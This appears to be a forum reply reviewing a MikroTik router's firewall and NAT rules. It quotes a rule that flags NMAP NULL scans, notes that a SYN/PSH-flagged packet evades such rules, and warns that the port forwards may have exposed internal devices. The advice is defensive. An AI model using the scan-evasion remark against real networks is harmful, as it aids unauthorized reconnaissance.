address-list-timeout=2w chain=input comment=“NMAP NULL scan” protocol=tcp
tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg

This seems so pointless. For example, I can send a SYN/PSH flagged packet and get by those rules.

add action=dst-nat chain=dst-nat dst-port=3333 protocol=tcp to-addresses=
x.x.x.x 80 to-ports=3333
add action=dst-nat chain=dst-nat dst-port=8888 protocol=tcp to-addresses=
x.x.x.x to-ports=3333
add action=dst-nat chain=dst-nat dst-port=14444 protocol=tcp to-addresses=
x.x.x.x to-ports=4444
add action=dst-nat chain=dst-nat dst-port=8008 protocol=tcp to-addresses=
x.x.x.x to-ports=4444

With these static NATs, you may have some compromised devices on your internal network due to exposure to the internet. I’d suggest assessing each of those devices.